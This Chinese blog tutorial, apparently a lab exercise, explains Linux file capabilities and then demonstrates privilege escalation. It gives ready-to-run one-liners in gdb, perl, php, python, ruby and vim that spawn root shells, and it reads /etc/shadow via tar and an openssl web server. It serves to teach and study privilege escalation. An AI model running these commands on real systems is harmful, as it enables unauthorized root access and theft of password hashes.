c linux 获取cpuid_Linux系统利用可执行文件的Capability实现权限提升

最新推荐文章于 2024-09-24 16:12:49 发布
最新推荐文章于 2024-09-24 16:12:49 发布
阅读量692 收藏
点赞数
文章标签: c linux 获取cpuid
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42157556/article/details/112336879
版权
本文介绍了Linux系统中如何利用Capabilities机制实现权限提升。详细讲述了如何通过getcap和setcap设置文件权限,以及如何通过gdb、perl、php、python、ruby、rvim、vim和tar等工具进行权限提升。还展示了openssl如何绕过权限检查读取敏感文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、操作目的和应用场景

1、 目的

在Linux系统中,利用可执行文件的capabilities实现权限提升。

2、 简介

Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组,Capabilites作为线程(Linux并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。

这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是root,就去检查其是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。

二、平台及工具版本

host系统:kali linux 2020

虚拟机管理程序:virtualbox

虚拟机:CentOS 7

三、操作步骤

(一)Linux Capabilities管理

1、 Linux系统管理Capabilities的工具

Linux系统中主要提供了两种工具来管理capabilities:libcap和libcap-ng。

libcap提供了getcap和setcap两个命令来分别查看和设置文件的capabilities,同时还提供了capsh来查看当前shell进程的capabilities。

libcap-ng更易于使用,使用同一个命令filecap来查看和设置capabilities。

2、 Capabilities的管理方法

(1)设置Capability

举个例子,安装wireshark软件后,默认情况下,普通用户无法对网卡实施抓包操作。这是因为普通用户不具备相应的权限。

3e29846a56e73b7e16cda83f99c0d263.png

为解决此问题,可以为/usr/bin/dumpcap文件授予抓包相关的capabilities:

setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap  

dd5af085b3307e1783585662613f252b.png

命令执行后重新启动wireshark,就可以抓包了。

(2)查看文件的Capability

getcap /usr/bin/dumpcap  //查看文件的capabilities

9ec346e365bfe4ab84700fdb27df08bf.png

(3)删除文件的capabilities

setcap -r /usr/bin/dumpcap

2c5da63838098010eebf3545ed754ad1.png

(二)利用Capability实现权限提升

现在假设管理员对一些可执行文件设置了capabilities。测试人员通过下面的命令查找这些文件:

getcap -r / 2>/dev/null

5c77e705212a26b5899c44dace63b6bd.png

之后我们针对其中的一部分程序尝试提权。

从上面查找结果中可以看到,很多文件的capability被设置为cap_setuid。但是文件cap_setuid的capabilities和文件的suid标志位之间是没有关系的:

a96cb5976a29f7a4877b451f3f3b3889.png

设置了cap_setuid的capability的文件并没有设置suid。

188d75f3517b976a6abd3866054c5ed5.png

设置了suid的程序也不拥有cap_setuid的capability。

1、 gdb

gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit

91b5cc1866924ceafa540b13c6178e23.png

提权成功,获取了root shell。

2、 perl

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

ec24b7fdb3fbaad8387ee066fe553f23.png

提权成功,获取了root shell。

3、 php

php -r "posix_setuid(0); system('/bin/sh');"

506002adad78b07e45590deddad2c037.png

在kali linux上提权成功,获取了root shell。

在CentOS 7系统中安装的低版本php无法提权:

0cd7ce5c559f30abd657577104800ba5.png

4、 python

python -c 'import os; os.setuid(0); os.system("/bin/sh")'

fbb459628b4bed2914c20a8e0c55bc26.png

提权成功,获取了root shell。

5、 ruby

ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'

5c791913060a10ccb97ee154bf9cf5e9.png

6、 rvim

rvim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

068ce5c7e33d78654a5fd163304f8a9c.png

执行后获取root shell:

45ebedb02e15c5ca14b7b7c955969ada.png

7、 vim

vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

a0675010dfa9addeae21b13892c6859f.png

执行后获得root shell:

5c8ec3a492be681f9c0fb82a162fc33c.png

8、 tar

951fa5de1b84f6dd6bed5aa7513f7170.png

cap_dac_read_search可以绕过文件的读权限检查以及目录的读/执行权限的检查,利用此特性我们可以读取系统中的敏感信息。

tar cvf shadow.tar /etc/shadow  //绕过权限检查即可成功创建压缩文件

tar -xvf shadow.tar  //解压缩

cd etc  //进入解压缩的目录

chmod +r shadow  //赋予读权限

cat shadow | grep root  //查看shadow文件的内容

3d599560687e70d4da4776cfddcc86dd.png

这样就读取了/etc/shadow文件的内容,类似的还有zip等文件,过程不再赘述。

9、 openssl

setcap =ep /usr/bin/openssl

36d40c2fb685334f2a84c592dd148f43.png

可以看到,openssl的capability被设置为空。下面我们尝试使用openssl读取/etc/shadow文件。

//使用openssl生成证书

cd /tmp

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

//启动web服务器,监听1337端口

cd /

openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 1337 -HTTP

//访问本机的web服务,读取/etc/shadow文件

curl -k "https://127.0.0.1:1337/etc/shadow"

5e9d73644e280d8401cfd8ae7bbc8ca6.png

提权成功。

Ningling Pan
关注
利用capabilities提权(setuid、cap_setuid)
墨痕诉清风的博客
08-21 1879
从而,在实际进行特权操作时,如果euid不是root,便会检查是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。我们运行SUID的命令时,通常只是需要使用一小部分特权,但是使用SUID,却可以拥有root用户的全部权限。当然,Permitted集合默认是不能增加新的capabilities的,除非CAP_SETPCAP在Effective集合中。每一个线程,具有3个capabilities的集合,每个集合中,可以包含零个或多个capabilities。...
Linux 2.6.19.x 内核编译配置选项简介
佛系程序员
02-02 1962
Linux 2.6.19.x 内核编译配置选项简介 作者:金步国 http://lamp.linux.gov.cn/Linux/kernel_options.html 版权声明 本文作者是一位自由软件爱好者,所以本文虽然不是软件,但是本着 GPL 的精神发布。任何人都可以自由使用、转载、复制和再分发,但必须保留作者署名,亦不得对声明中的任何条款作任何形式的修改,也不得附
Capabilities位提权
m0_57221101的博客
04-02 1700
linux2.2之后,产生了Capabilities用于分隔root权限,以便于用户更好,更安全,更精细的管理机器的功能和权限。 具体的相关与capabilities的使用方面知识可以去参考这篇文章Linux Capabilities 简介 - sparkdev - 博客园 (cnblogs.com) 这里仅讨论对提权有帮助的CAP_SETUID标志 操作 首先需要探查有CAP_SETUID标志的进程 /usr/sbin/getcap -r / 2>/dev/null 这样来找到进程
linux系统利用可执行文件的Capabilities实现权限提升
whatday的专栏
10-25 3260
一、操作目的和应用场景 Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组,Capabilites作为线程(Linux并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。 这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是root,就去检查其是否具有该特权操作所对应的capabilities,并以此为
Capabilities提权
最新发布
m0_68636078的博客
09-24 431
自用
Capadlities提权
weixin_51151193的博客
12-29 646
Capadlities提权操作
OpenHarmony开发实战探索: Linux 环境中的SDK 使用
m0_70749039的博客
07-01 2419
Ubuntu 20.04(推荐) 环境下 使用 OpenHarmony SDK 编译,OpenHarmony standard 系统北向应用 c/c++ 库
x86: perf_events内核初始化
大昱的博客
08-20 1648
Linux性能计数器的使用(perf_events)可能会带来泄露受监控进程访问的敏感数据的巨大风险。在直接使用perf_events系统调用API的情况下,数据泄露都是可能的以及由perf工具用户模式实用程序(perf)生成的数据文件风险取决于perf_events性能监控单元(PMU)的数据的性质和perf收集并公开以进行性能分析。收集的系统和性能数据可分为以下几类尔“架构性能监控”CPUID检测/枚举详细信息struct {} split;};cpu_hw_events CPU硬件事件/**//*
Linux 2.6 menuconfig内核编译配置选项详解
android移动设备
07-02 1万+
Code maturity level options 代码成熟度选项 Prompt for development and/or incomplete code/drivers 显示尚在开发中或尚未完成的代码与驱动.除非你是测试人员或者开发者,否则请勿选择 General setup 常规设置 Local version - append to kernel re
linux 内核编译选项详解
12-09 3080
Code maturity level options  [代码成熟度选项]                 Prompt for development and/or incomplete code/drivers [使能尚在开发中或尚未完成的代码与驱动.除非你是测试人员或者开发者,否则请勿选择] General setup             Local version - ap
shell获取capabilities_Linux提权(capabilities)
weixin_32905035的博客
12-31 372
0x00 Capabilities入门什么是CapabilitiesLinux的Root用户拥有最高的权限,可以对几乎系统中的任何文件进行操作。然而普通用户如何操作一些高权限的文件?在Linux中存在两种方法:第一种是在执行的命令前加上sudo,这样就会以Root的身份进行操作。第二种方法是设置SUID或SGID,这样虽然会以原用户的身份进行操作,但是获得了操作权限。SUID和SGID存在安全隐患...
vulhub靶场Hacker_Kids-Capability能力提权
qq_55349490的博客
06-01 858
因为/etc/passwd里面没有admin用户,所以这个并不是系统用户的账号密码,可能是网站后台或者数据库密码的。这个利用与windows提权中的进程注入提权类似。允许跟着任何进程,我们就可以。当注入到有root权限的进程后会开放5600端口,kali连接5600。我们在kali里面测试一下。用一个不是root权限的用户进行测试。遍历爆破/page_no=* 找到正确的/page_no=21。就可以享受宿主进程的权限(root权限)查看saket用户的.bashrc文件。中发现可以利用给的就是。
hackerkid靶机之DNS区域传输、XXE注入攻击、PHP封装器、SSTI模板注入、Capabilitie提权
qq_40898302的博客
05-18 224
查询Capabilities权限。打靶目标:取得 root 权限。下载python的利用脚本。查询以root运行的程序。万能检测payload。
权限提升-Linux系统权限提升篇&Vulnhub&Capability能力&LD_Preload加载&数据库等
SuperherRo的博客
03-31 1285
1、Web或用户到Linux-数据库类型 2、Web或用户到Linux-Capability能力 3、普通用户Linux-LD_Preload加载so配合sudo 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
Linux Capabilities机制
四儿家的小祖宗的博客
03-25 779
Linux 是一种安全的操作系统,它把所有的系统权限都赋予了一个单一的 root 用户,只给普通用户保留有限的权限。为了对 root 权限进行更细粒度的控制,实现按需授权,Linux 引入了另一种机制叫 capabilities。
linux下git使用pem文件作为ssh key的方式
hjxisking的专栏
05-22 1063
配置ssh key,注意pem文件必须是600权限 vim ~/.ssh/config Host 192.168.93.38 User git IdentityFile ~/.ssh/***.pem 测试ssh key是否可用 ssh -T git@192.168.93.47 如果不需要输入密码,则说明通过 接下来就可以正常使用这个ip对应的git仓库了 ======================================================..
linux根新建一个目录为cap,Linux基础命令
weixin_39930144的博客
05-06 268
Linux 内核最初只是由芬兰人林纳斯·托瓦兹(Linus Torvalds)在赫尔辛基大学上学时出于个人爱好而编写的。Linux 是一套免费使用和自由传播的类 Unix 操作系统,是一个基于 POSIX 和 UNIX 的多用户、多任务、支持多线程和多 cpu 的操作系统Linux 能运行主要的 UNIX 工具软件、应用程序和网络协议。它支持 32 位和 64 位硬件。Linux 继承了 Uni...
Vulnhub靶场——Hacker_Kid-v1.0.1
Re1_zf的博客
10-10 1161
这里需要用到一个提权脚本,这个脚本的作用就是对root权限的进程注入python类型shellcode,利用python具备的cap_sys_ptrace+ep能力实现权限提升。此脚本如果执行成功,会在靶机本地监听5600端口,不过也可以修改脚本shellcode部分使其监听其他端口。搜索后发现,9999端口开放的一般是tornado服务,是一个python的web服务框架。前面访问的9999端口是一个登录页面,也许有用,拿去尝试登录一下。给name变量赋值会有回显,后端的变量应该就是name。
Linux下C代码中修改文件访问权限
热门推荐
yasi_xi的专栏
01-29 1万+
转自:http://blog.chinaunix.net/uid-25940216-id-3207480.html 【Yasi注】:注意,不能想当然的认为,调用chmod("/opt/*", S_IRUSR),就可以把/opt 目录下的所有文件和子文件夹都置成了 r-------- (400),事实上没那么简单!这样做只会把/opt目录下的第一个文件或子文件夹置成 r--------
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值